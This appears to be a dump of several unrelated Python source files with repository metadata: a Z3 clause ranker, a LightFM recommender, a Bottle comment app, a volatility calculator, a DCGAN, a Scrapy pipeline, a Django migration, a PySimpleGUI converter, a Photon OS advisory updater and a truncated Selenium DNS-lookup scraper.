self.setup_ranking_dicts(inner_prop)
self.rank_clauses()
def check_clauses_on_model_and_step(self, clauses, step, negate, cond):
old_clauses = list(clauses)
clauses.clear()
for cur_clause in old_clauses:
sub_clause = substitute(
substitute(And(cur_clause, cond), self.get_subs_for_cex_step(step)),
self.get_subs_for_next_cex_step(step + 1),
)
eval_bool = self.model.eval(sub_clause)
if negate and not eval_bool or not negate and eval_bool:
clauses.add(cur_clause)
def get_top_interpolant(self):
try:
top = sorted(self.ranking)[-1]
top_interp = self.ranking[top]
if top_interp in self.trigger_clauses:
return "trigger", top_interp
else:
return "safe", top_interp
except IndexError as e:
return "trigger", list(self.all_clauses)[-1]
# def generate_interpolants(self):
# print("TRIGGERS:")
# for tc in self.trigger_clauses:
# print(tc)
# print("SAFE:")
# for sc in self.safe_clauses:
# print(sc)
# ranking = self.rank_clauses()
# print(f"Prop: {self.prop.consequents}")
# pprint.pprint(ranking)
# for rank in reversed(sorted(ranking)):
# interp = ranking[rank]
# if interp in self.safe_clauses:
# yield "safe", interp
# else:
# yield "trigger", interp
def setup_ranking_dicts(self, cur_prop_term):
if cur_prop_term.children():
self.used_funcs[str(cur_prop_term.decl())] += 1
for child in cur_prop_term.children():
self.setup_ranking_dicts(child)
else:
str_term = str(cur_prop_term)
if self.is_var(str_term):
self.used_vars[str_term] += 1
else:
self.used_consts[str_term] += 1
def is_var(self, term):
for var in self.all_vars:
if var.match_name(term):
return True
return False
def rank_clauses(self):
ranking = {}
for clause in self.trigger_clauses:
# prefer triggers
ranking[self.get_rank(clause) * 2] = clause
for clause in self.safe_clauses:
ranking[self.get_rank(clause)] = clause
self.ranking = ranking
def get_rank(self, clause):
str_clause = str(clause)
rank = -1 * len(str_clause) # prefer shorter
for v in self.used_vars:
if v in str_clause:
rank += 20 * self.used_vars[v]
for f in self.used_funcs:
if f in str_clause:
rank += 15 * self.used_funcs[f]
for c in self.used_consts:
if c in str_clause:
rank += 10 * self.used_consts[c]
return rank
def get_subs_for_cex_step(self, step):
return [var.make_step_var_sub(step) for var in self.all_vars]
def get_subs_for_next_cex_step(self, step):
return [var.make_step_next_var_sub(step) for var in self.all_vars]
def get_subs_for_var_to_next_var(self):
return [var.make_cur_var_to_next_sub() for var in self.all_vars]
| cvick32/ConditionalHistory | src/synthesizer.py | synthesizer.py | py | 4,666 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "z3.Not",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "z3.substitute",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict"... |
37649351161 | '''
Recommendation Systems: the ML algorithm will learn our likes and
recommend what option would be best for us. These learning algorithms
are getting accurate as time passes
Types:
1)Collaborative Systems: predict what you like based on other similar
users have liked in the past
2)Content-Based: predict what you like based on what you have liked
in the past
eg:Netflix combines both approaches to predict your likes more accurately
APP: this script reads in a dataset of movie ratings and recommends new
movies for users
Dependencies: numpy, scipy, lightfm
lightfm: helps in performing bunch of recommendation algos,a great lib
to start with for building recommendation systems
'''
import numpy as np
#lets use the 'fetch_movielens' method from submodule datasets
#try diff methods to obtain diff results and compare the accuracy
from lightfm.datasets import fetch_movielens
from lightfm import LightFM
#fetch the dataset and format it
#we will be using MovieLens dataset(available on Kaggle)
data = fetch_movielens(min_rating=4.0)
#make interaction matrix from the csv and store it in data as a dictionary
print(repr(data['train']))
print(repr(data['test']))
#loss means loss func which measures loss = (model pred - desired output)
#we minimize it during the training to gain more accuracy
#Weighted Approx Rank Pairwise-warp
model = LightFM(loss='warp')
#epochs-no of runs, num_threads = parallel computation
model.fit(data['train'], epochs=30, num_threads=2)
def sample_recommendation(model, data, user_ids):
#no of users and movies using shape attribute of dicts
n_users, n_items = data['train'].shape
for user_id in user_ids:
#csr - compressed sparse row format
#tocsr is a subarray which will retrieve using the indices attributes
known_positives = data['item_labels'][data['train'].tocsr()[user_id].indices]
#movies our model will predict
scores = model.predict(user_id, np.arange(n_items))
#sort them in order of their scores
#scores in desc order because of the negative sign
top_items = data['item_labels'][np.argsort(-scores)]
#print out user_ids
print("Users %s" % user_id)
print(" Known Positives:")
#top 3 known_positives the user has picked
for x in known_positives[:3]:
print(" %s" % x)
#top 3 recommended movies predicted by our model
print(" Recommended:")
for x in top_items[:3]:
print(" %s" %x)
'''
print('Enter 3 random ids:')
idList = []
for i in range(3):
idList = int(input('ENTER:'))
'''
#enter in 3 random userids
sample_recommendation(model, data, [4, 45, 89])
'''
def main():
input('Enter 3 random user ids:')
idList = []
for i in range(3):
idList = int(input('ENTER:'))
sample_recommendation(model, data, idList)
if __name__ == '__main__':
main()
''' | ketanp05/MovieRecommendation | app.py | app.py | py | 3,004 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "lightfm.datasets.fetch_movielens",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "lightfm.LightFM",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.a... |
19989928968 | # Import Python packages
import json
import os
# Import Bottle
import bottle
from bottle import Bottle, request, Response, run, static_file
import requests
from truckpad.bottle.cors import CorsPlugin, enable_cors
# Define dirs
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_DIR = os.path.join(BASE_DIR, 'dist')
# App Config
bottle.debug(False)
app = Bottle()
@app.get('/')
def show_index():
"""Show Index page"""
return static_file('index.html', root=STATIC_DIR)
@app.post('/comment')
def post_comment():
comment = request.json.get('comment')
email = request.json.get('email')
payload = {
'eventData': {
'eventType': 'Comment',
}
}
if comment:
payload['eventData']['comment'] = comment
if email:
payload['eventData']['email'] = email
res = requests.post('https://api.kevalin.io/v0/collections/SERVICE.R4R.COMMENTS/events',
headers={'Authorization': f'X-API-Key {os.getenv("KEVALIN_API_KEY")}'},
json=payload)
res.raise_for_status()
# Static files route
@app.get('/<filename:path>')
def get_static_files(filename):
"""Get Static files"""
return static_file(filename, root=STATIC_DIR)
app.install(CorsPlugin(origins=['*.rax.io']))
# Run server
run(app, server='auto', host='0.0.0.0', port=8080, reloader=True)
| IDPLAT/tes-engagement | tes-engagement/app.py | app.py | py | 1,373 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line... |
15867444691 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from typing import Any, Dict, Generic, Type, TypeVar, NoReturn
from pydantic import BaseModel
from sqlalchemy import select, update, delete, and_
from sqlalchemy.ext.asyncio import AsyncSession
from backend.app.models.base import MappedBase
ModelType = TypeVar('ModelType', bound=MappedBase)
CreateSchemaType = TypeVar('CreateSchemaType', bound=BaseModel)
UpdateSchemaType = TypeVar('UpdateSchemaType', bound=BaseModel)
class CRUDBase(Generic[ModelType, CreateSchemaType, UpdateSchemaType]):
def __init__(self, model: Type[ModelType]):
self.model = model
async def get_(
self,
db: AsyncSession,
*,
pk: int | None = None,
name: str | None = None,
status: int | None = None,
del_flag: int | None = None,
) -> ModelType | None:
"""
通过主键 id 或者 name 获取一条数据
:param db:
:param pk:
:param name:
:param status:
:param del_flag:
:return:
"""
assert pk is not None or name is not None, '查询错误, pk 和 name 参数不能同时存在'
assert pk is None or name is None, '查询错误, pk 和 name 参数不能同时为空'
where_list = [self.model.id == pk] if pk is not None else [self.model.name == name]
if status is not None:
assert status in (0, 1), '查询错误, status 参数只能为 0 或 1'
where_list.append(self.model.status == status)
if del_flag is not None:
assert del_flag in (0, 1), '查询错误, del_flag 参数只能为 0 或 1'
where_list.append(self.model.del_flag == del_flag)
result = await db.execute(select(self.model).where(and_(*where_list)))
return result.scalars().first()
async def create_(self, db: AsyncSession, obj_in: CreateSchemaType, user_id: int | None = None) -> NoReturn:
"""
新增一条数据
:param db:
:param obj_in: Pydantic 模型类
:param user_id:
:return:
"""
if user_id:
create_data = self.model(**obj_in.dict(), create_user=user_id)
else:
create_data = self.model(**obj_in.dict())
db.add(create_data)
async def update_(
self, db: AsyncSession, pk: int, obj_in: UpdateSchemaType | Dict[str, Any], user_id: int | None = None
) -> int:
"""
通过主键 id 更新一条数据
:param db:
:param pk:
:param obj_in: Pydantic模型类 or 对应数据库字段的字典
:param user_id:
:return:
"""
if isinstance(obj_in, dict):
update_data = obj_in
else:
update_data = obj_in.dict(exclude_unset=True)
if user_id:
update_data.update({'update_user': user_id})
result = await db.execute(update(self.model).where(self.model.id == pk).values(**update_data))
return result.rowcount
async def delete_(self, db: AsyncSession, pk: int, *, del_flag: int | None = None) -> int:
"""
通过主键 id 删除一条数据
:param db:
:param pk:
:param del_flag:
:return:
"""
if del_flag is None:
result = await db.execute(delete(self.model).where(self.model.id == pk))
else:
assert del_flag == 1, '删除错误, del_flag 参数只能为 1'
result = await db.execute(update(self.model).where(self.model.id == pk).values(del_flag=del_flag))
return result.rowcount
| fastapi-practices/fastapi_best_architecture | backend/app/crud/base.py | base.py | py | 3,602 | python | en | code | 96 | github-code | 36 | [
{
"api_name": "typing.TypeVar",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "backend.app.models.base.MappedBase",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "typing.TypeVar",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pyda... |
7369258562 | from typing import Union
import pandas as pd
import numpy as np
from Functions.date_parser import parse_dates
from Functions.data_reader import read_data
def get_historical_volatility(main_df: pd.DataFrame,
period_start: Union[str],
period_end: Union[str, None],
lambda_factor: Union[None, float]):
# Return error when start date is None
if period_start is None:
rate_of_return = "ERROR: Start Date is required"
return rate_of_return
# using defaults where passed value is none
period_end = 'Latest' if period_end is None else period_end
# Get parsed start and end dates
start_date, end_date = parse_dates(period_start, period_end,
main_df)
if isinstance(start_date, str):
volatility_val = start_date
return volatility_val
if pd.isnull(start_date):
volatility_val = "ERROR: No data found prior to start date"
return volatility_val
# Filter data
main_df = main_df.set_index('Date')
main_df = main_df[(main_df.index >= start_date) &
(main_df.index <= end_date)]
# Order by date
main_df = main_df.sort_values(by='Date')
# Compute performance
main_df['Performance'] = np.log(main_df.Price / main_df.
Price.shift())
main_df = main_df[1:]
# Calculate volatility with Lambda
if lambda_factor is None:
main_df['Vol'] = (main_df['Performance'] -
main_df['Performance'].mean()) ** 2
volatility_val = np.sqrt(((main_df['Vol'].sum() * 252)
/ main_df.shape[0]))
volatility_val = np.round(volatility_val, 6)
# Calculate volatility without Lambda
else:
main_df = main_df.sort_values(by='Date', ascending=False)
main_df['Weight'] = (1 - lambda_factor) * lambda_factor \
** np.arange(len(main_df))
volatility_val = np.round(
np.sqrt(
((main_df['Weight'] * main_df['Performance'] ** 2).sum()
* 252) / (main_df['Weight'].sum())
), 6
)
return volatility_val
def historical_volatility(maven_asset_code: str, price_type: str,
currency: str, period_start: list,
period_end: list,
lambda_factor: Union[None, float] = None
) -> dict:
"""
:param lambda_factor:
:param currency:
:param maven_asset_code: Asset Code str
:param price_type: Price Type str
:param period_start: Period Start str
:param period_end: Period End str
:return:
"""
# NotImplementedError for currency (will be removed later)
if currency is not None:
raise NotImplementedError('ERROR: Currency is not supported')
# read data
main_df = read_data(maven_asset_code, price_type)
list_it = iter([period_start, period_end])
list_lens = len(next(list_it))
if not all(len(l) == list_lens for l in list_it):
raise ValueError('ERROR: Ensure all passed list are '
'of same length!')
volatility_list = []
for start_date, end_date in zip(period_start, period_end):
try:
volatility_val = get_historical_volatility(main_df,
start_date,
end_date,
lambda_factor)
volatility_list.append(volatility_val)
except (Exception,):
volatility_list.append(None)
result_dict = {'Volatility': volatility_list}
return result_dict
# #
# mvn_historical_volatility (SPY US, PR, , [1Y,2W,6M,3Q,95D,Inception],,0.9)
# maven_asset_code = 'SPY US'
# price_type = 'PR'
# period_start = ['1Y','2W','6M','3Q','95D','Inception']
# period_end = [None, None, None, None, None, None]
# # lambda_factor = 0.9
# #
# # result = historical_volatility(maven_asset_code, price_type, None,period_start, period_end, lambda_factor)
# # print(result)
# #
# result = historical_volatility(maven_asset_code, price_type, None,period_start, period_end)
# print(result) | fhashim/time_series_test | Functions/mvn_historical_volatility.py | mvn_historical_volatility.py | py | 4,342 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "typing.Union",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"l... |
37735076181 | from __future__ import division
import os
import time
import math
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
from ops import *
from utils import *
class DCGAN(object):
def __init__(self, sess, input_size=28,
batch_size=64, sample_num=64, output_size=28,
z_dim=62, c_dim=1, dataset_name='default',
checkpoint_dir=None, sample_dir=None):
"""
Args:
sess: TensorFlow session
input_size: The size of input image.
batch_size: The size of batch. Should be specified before training.
z_dim: (optional) Dimension of dim for Z. [100]
c_dim: (optional) Dimension of image color. For grayscale input, set to 1. [1]
"""
self.sess = sess
self.batch_size = batch_size
self.sample_num = sample_num
self.input_size = input_size
self.output_size = output_size
self.z_dim = z_dim
self.c_dim = c_dim
self.dataset_name = dataset_name
self.checkpoint_dir = checkpoint_dir
self.counter = 1
self.build_model()
def discriminator(self, image, reuse=False, train=True):
with tf.variable_scope("discriminator", reuse=reuse):
#######################################################
# TODO: Define discrminator network structure here. op.py
# includes some basic layer functions for you to use.
# Please use batch normalization layer after conv layer.
# And use 'train' argument to indicate the mode of bn.
#######################################################
d = lrelu(conv2d(image, 32, 4, 4, 2, 2, name="d_conv1"), name="d_lrelu1")
# self.d1_shape = d.shape
d = lrelu(batch_norm(conv2d(d, 64, 4, 4, 2, 2, name="d_conv2"), train=train, name="d_bn2"), name="d_lrelu2")
# self.d2_shape = d.shape
d = lrelu(batch_norm(conv2d(d, 256, 4, 4, 2, 2, name="d_conv2_1"), train=train, name="d_2_1_bn"),
name="d_2_1_lrelu")
d = tf.reshape(d, [self.batch_size, -1])
# self.d2_flat_shape = d.shape
d = lrelu(batch_norm(linear(d, 512, 'd_conv3'), train=train, name="d_bn3"), name="d_lrelu3")
# self.d3_shape = d.shape
out_logit = linear(d, 1, "d_fc4")
out = tf.nn.sigmoid(out_logit)
return out, out_logit
#######################################################
# end of your code
#######################################################
def generator(self, z, reuse=False, train=True):
with tf.variable_scope("generator", reuse=reuse):
#######################################################
# TODO: Define decoder network structure here. The size
# of output should match the size of images. Image scale
# in DCGAN is [-1, +1], so you need to add a tanh layer
# before the output. Also use batch normalization layer
# after deconv layer, and use 'train' argument to indicate
# the mode of bn layer. Note that when sampling images
# using trained model, you need to set train='False'.
#######################################################
g = tf.nn.relu(batch_norm(linear(z, 1024, "g_fc1"), train=train, name="g_bn1"))
g = tf.nn.relu(batch_norm(linear(g, 128*7*7, "g_fc2"), train=train, name="g_bn2"))
g = tf.reshape(g, [self.batch_size, 7, 7, 128])
g = tf.nn.relu(batch_norm(deconv2d(g, [self.batch_size, 14, 14, 64], 4, 4, 2, 2, name="g_deconv3"),
train=train, name="g_bn3"))
g = tf.nn.sigmoid(deconv2d(g, [self.batch_size, 28, 28, 1], 4, 4, 2, 2, name="g_deconv4"))
return g
#######################################################
# end of your code
#######################################################
def build_model(self):
#######################################################
# TODO: In this build_model function, define inputs,
# operations on inputs and loss of DCGAN. For input,
# you need to define it as placeholders. Discriminator
# loss has two parts: cross entropy for real images and
# cross entropy for fake images generated by generator.
# Set reuse=True for discriminator when calculating the
# second cross entropy. Define two different loss terms
# for discriminator and generator, and save them as
# self.d_loss and self.g_loss respectively.
#######################################################
# Inputs
self.x = tf.placeholder(tf.float32, shape=[self.batch_size, self.input_size, self.input_size, self.c_dim],
name='real_images')
self.z = tf.placeholder(tf.float32, shape=[self.batch_size, self.z_dim], name='z')
# Gaussian White noise for training
g_noise = tf.random_normal(shape=self.x.shape, mean=0, stddev= 1 / (self.counter**0.5))
# Real data with Discriminator
D_real, D_real_logits = self.discriminator(self.x + g_noise, train=True, reuse=False) #
# Fake data from Generator with Discriminator
G = self.generator(self.z, train=True, reuse=False)
D_fake, D_fake_logits = self.discriminator(G, train=True, reuse=True)
# Loss of Discriminator
d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real_logits,
labels=tf.ones_like(D_real) * 0.7))
d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits,
labels=tf.zeros_like(D_fake)))
self.d_loss = d_loss_real + d_loss_fake
# Loss of Generator
self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits,
labels=tf.ones_like(D_fake)))
# Test
self.x_fake = self.generator(self.z, reuse=True, train=False)
#######################################################
# end of your code
#######################################################
# define var lists for generator and discriminator
t_vars = tf.trainable_variables()
self.d_vars = [var for var in t_vars if 'd_' in var.name]
self.g_vars = [var for var in t_vars if 'g_' in var.name]
self.saver = tf.train.Saver()
def train(self, config):
# create two optimizers for generator and discriminator,
# and only update the corresponding variables.
self.sample_z = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))
d_optim = tf.train.AdamOptimizer(config.learning_rate / 5, beta1=config.beta1) \
.minimize(self.d_loss, var_list=self.d_vars)
g_optim = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1) \
.minimize(self.g_loss, var_list=self.g_vars)
try:
self.sess.run(tf.global_variables_initializer())
except:
tf.initialize_all_variables().run()
# load MNIST data
mnist = tf.contrib.learn.datasets.load_dataset("mnist")
data = mnist.train.images
data = data.astype(np.float32)
data_len = data.shape[0]
data = np.reshape(data, [-1, 28, 28, 1])
data = data * 2.0 - 1.0
could_load, checkpoint_counter = self.load(self.checkpoint_dir)
if could_load:
self.counter = checkpoint_counter
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
for epoch in xrange(config.epoch):
batch_idxs = min(data_len, config.train_size) // config.batch_size
for idx in xrange(0, batch_idxs):
batch_images = data[idx * config.batch_size:(idx + 1) * config.batch_size, :]
#######################################################
# TODO: Train your model here. Sample hidden z from
# standard uniform distribution. In each step, run g_optim
# twice to make sure that d_loss does not go to zero.
# print the loss terms at each training step to monitor
# the training process. Print sample images every
# config.print_step steps.You may use function
# save_images in utils.py to save images.
#######################################################
batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)
_, d_loss = self.sess.run([d_optim, self.d_loss], feed_dict={self.x: batch_images, self.z: batch_z})
_, g_loss = self.sess.run([g_optim, self.g_loss], feed_dict={self.x: batch_images, self.z: batch_z})
if np.mod(self.counter, 10) == 1:
print("Epoch: [%2d] [%4d/%4d], d_loss: %.8f, g_loss: %.8f" % (epoch, idx, batch_idxs, d_loss,
g_loss))
#######################################################
# end of your code
#######################################################
self.counter += 1
if np.mod(self.counter, 500) == 1:
self.save(config.checkpoint_dir, self.counter)
if np.mod(self.counter, 100) == 0:
samples = self.sess.run(self.x_fake, feed_dict={self.z: self.sample_z})
save_images(samples, image_manifold_size(samples.shape[0]),
'./{}/train_{:02d}_{:04d}.png'.format(config.sample_dir, epoch, idx + 1))
@property
def model_dir(self):
return "{}_{}_{}_{}".format(
self.dataset_name, self.batch_size,
self.output_size, self.output_size)
def save(self, checkpoint_dir, step):
model_name = "DCGAN.model"
checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
import re
print(" [*] Reading checkpoints...")
checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
self.counter = int(next(re.finditer("(\d+)(?!.*\d)", ckpt_name)).group(0))
print(" [*] Success to read {}".format(ckpt_name))
return True, self.counter
else:
print(" [*] Failed to find a checkpoint")
return False, 0
| riemanli/UCLA_STATS_232A_Statistical_Modeling_and_Learning_in_Vision_and_Cognition | project4/gan/model_gan.py | model_gan.py | py | 11,459 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.variable_scope",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "tensorflow.reshape",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "tensorflow.nn.sigmoid",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "te... |
29620255242 | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
import time
import codecs
import json
import os
class AiqichademoPipeline:
def __init__(self):
super().__init__() # 执行父类的构造方法
today = time.strftime('%Y-%m-%d', time.localtime())
self.fp = codecs.open('scraped_data'+today +
'.json', 'w', encoding='utf-8')
self.fp.write('[')
def process_item(self, item, spider):
# 将item转为字典
d = dict(item)
# 将字典转为json格式
string = json.dumps(d, ensure_ascii=False)
self.fp.write(string + ',\n') # 每行数据之后加入逗号和换行
return item
def close_spider(self, spider):
self.fp.seek(-2, os.SEEK_END) # 定位到倒数第二个字符,即最后一个逗号
self.fp.truncate() # 删除最后一个逗号
self.fp.write(']') # 文件末尾加入一个‘]’
self.fp.close() # 关闭文件
| hua345/myBlog | python/scrapy/aiqichaDemo/aiqichaDemo/pipelines.py | pipelines.py | py | 1,210 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.strftime",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "time.localtime",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "codecs.open",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_numbe... |
23411369560 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('clientes', '0002_auto_20150927_2202'),
]
operations = [
migrations.CreateModel(
name='ReservaEstado',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('reserva_estado', models.CharField(max_length=1)),
('descripcion', models.CharField(max_length=50)),
],
),
migrations.RenameField(
model_name='reserva',
old_name='reserva_descripcion',
new_name='descripcion',
),
migrations.RenameField(
model_name='reserva',
old_name='reserva_fecha_hora',
new_name='fecha_hora',
),
migrations.RemoveField(
model_name='reserva',
name='reserva_estado',
),
migrations.AlterField(
model_name='cliente',
name='fecha_nacimiento',
field=models.DateField(default=datetime.datetime(2015, 9, 28, 5, 32, 10, 889000, tzinfo=utc)),
),
migrations.AddField(
model_name='reserva',
name='estado',
field=models.ForeignKey(default=b'V', to='clientes.ReservaEstado'),
),
]
| pmmrpy/SIGB | clientes/migrations_2/0003_auto_20150928_0132.py | 0003_auto_20150928_0132.py | py | 1,491 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.CreateModel",
"line_number": 16,
"usage_type": "call"
},
... |
6348823299 | # This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
# Press the green button in the gutter to run the script.
import requests
import bs4
def get_document(url):
req = requests.get(url)
if req.status_code == 200:
html = req.text
soup = bs4.BeautifulSoup(html, "html.parser")
return soup # return the instance of bs4
else:
print("Getting code is failure")
return None
def find_image_links(soup):
# init variables
paths = list()
result = list()
paths = soup.select("div.separator > a")
for path in paths:
result.append(path.get('href'))
return result
url = "https://deblur99.blogspot.com/2021/07/uploading21-07-21.html"
soup = get_document(url)
f = open("./link_list.txt", 'w')
if soup is not None:
linkList = find_image_links(soup)
# additional deletion
# linkList[6] = ""
# linkList[24] = ""
for link in linkList:
if link != "":
f.write(f'<img src=\"{link}\">\n')
f.close()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
| deblur99/getURLsFromBlogger | main.py | main.py | py | 1,225 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 17,
"usage_type": "call"
}
] |
70387110823 | "Converter with PySimpleGUI"
import PySimpleGUI as sg
layout = [[sg.Input(key="-INPUT-", size=(40, 40)),
sg.Spin(["kilometer to meter", "meter to decimeter", "dosimeter to centimeter"], background_color="black", text_color="white", key="-SPIN-"),
sg.Button("convert", key="-CONVERT-", button_color="black")],
[sg.Text("output", key="-OUTPUT-", background_color="white", text_color="black")]]
window = sg.Window("converter", layout, background_color="white", size=(500, 100))
while True:
event, values = window.read()
if event == sg.WIN_CLOSED:
break
if event == "-CONVERT-":
input_number = values["-INPUT-"]
if input_number.isnumeric():
if values["-SPIN-"] == "kilometer to meter":
output = round(float(input_number) * 1000, 2)
output_str = f"{input_number} km is {output}m"
if values["-SPIN-"] == "meter to decimeter":
output = round(float(input_number) * 10, 2)
output_str = f"{input_number} m is {output}dm"
if values["-SPIN-"] == "dosimeter to centimeter":
output = round(float(input_number) * 10, 2)
output_str = f"{input_number} dm is {output}cm"
window["-OUTPUT-"].update(output_str)
else:
window["-OUTPUT-"].update("please enter a number!!!!!!!!!!!!!!!! not a text!")
window.close()
| HadisehMirzaei/converter-PySimpleGUI | main.py | main.py | py | 1,436 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PySimpleGUI.Input",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.Spin",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.Button",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.Text",... |
32181630269 | import sys
import markdown
import json
import os
import re
from bs4 import BeautifulSoup
# This is a WIP unused script to
# write data back to the GSD database
advisories_dir = sys.argv[1]
gsd_dir = sys.argv[2]
CVE_REGEX = r"CVE-\d{4}-\d{4,7}"
FILE_FORMAT = "/Security-Updates-{version}.md"
ADVISORY_URL = "https://github.com/vmware/photon/wiki/Security-Update-{slug}"
PHOTON_VERSIONS = range(1, 5)
def advisory_slug(os_version, advisory):
_id = int(advisory.split("-")[2])
return f"{os_version}.0-{_id}"
def generate_cve_mapping():
mapping = {}
for version in PHOTON_VERSIONS:
filename = FILE_FORMAT.format(version=version)
file = advisories_dir + filename
with open(file, "r") as f:
table_html = markdown.markdown(
f.read(), extensions=["markdown.extensions.tables"]
)
soup = BeautifulSoup(table_html, "html.parser")
for tr in soup.find("tbody").find_all("tr"):
(advisory, severity, date, packages, cves) = [
x.text for x in tr.find_all("td")
]
cves = re.findall(CVE_REGEX, cves)
for cve in cves:
slug = advisory_slug(version, advisory)
if cve in mapping:
mapping[cve].append(slug)
else:
mapping[cve] = [slug]
return mapping
def __main__():
mapping = generate_cve_mapping()
for cve in mapping:
(_, year, _id) = cve.split("-")
grouping_id = _id[:-3] + "xxx"
gsd = f"GSD-{year}-{_id}"
path = f"{gsd_dir}/{year}/{grouping_id}/{gsd}.json"
if os.path.exists(path):
updated = False
data = None
with open(path, "r") as f:
data = json.loads(f.read())
slugs = mapping[cve]
urls = [ADVISORY_URL.format(slug=slug) for slug in slugs]
if 'gsd' in data:
existing_links = [x['url'] for x in data['gsd']['references']]
missing_links = existing_links - urls
if len(missing_links) > 0:
for url in urls:
data['gsd']['references'].append({
"type": "ADVISORY",
"url": url
})
elif 'GSD' in data and 'references' in data['GSD']:
data['GSD']['references'].extend(urls)
elif 'GSD' in data:
data['GSD']['references'] = urls
else:
try:
description = data['namespaces']['cve.org']['description']['description_data'][0]['value']
except KeyError:
description = data['namespaces']['nvd.nist.gov']['cve']['description']['description_data'][0]['value']
data['GSD'] = {
"alias": cve,
"description": description,
"id": gsd,
"references": urls
}
with open(path, 'w') as f:
f.write(json.dumps(data, indent=4))
else:
print(f"Could not find {cve}")
if __name__ == "__main__":
__main__()
| captn3m0/photon-os-advisories | update.py | update.py | py | 3,376 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "markdown.markdown",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
... |
18617757117 | # modules in standard library
import re
from urllib.parse import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys #需要引入 keys 包
import time
class DnsRecord(object):
def __init__(self, domain):
"""
初始化基本信息
:param target: 要扫描的目标域名
"""
self.domain = domain
self.session = requests.Session()
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.8',
'Accept-Encoding': 'gzip',
}
def get_by_hackertarget(self):
subdomains = []
base_url="https://hackertarget.com/find-dns-host-records/"
#driver = webdriver.Chrome()
driver = webdriver.Firefox() #打开浏览器
#driver.get("http://www.baidu.com")
driver.get(base_url) #打开网页
#通过name方式定位
driver.find_element_by_name("theinput").send_keys(self.domain) #定位输入查询域名
#time.sleep(3)
#driver.maximize_window() #浏览器全屏显示
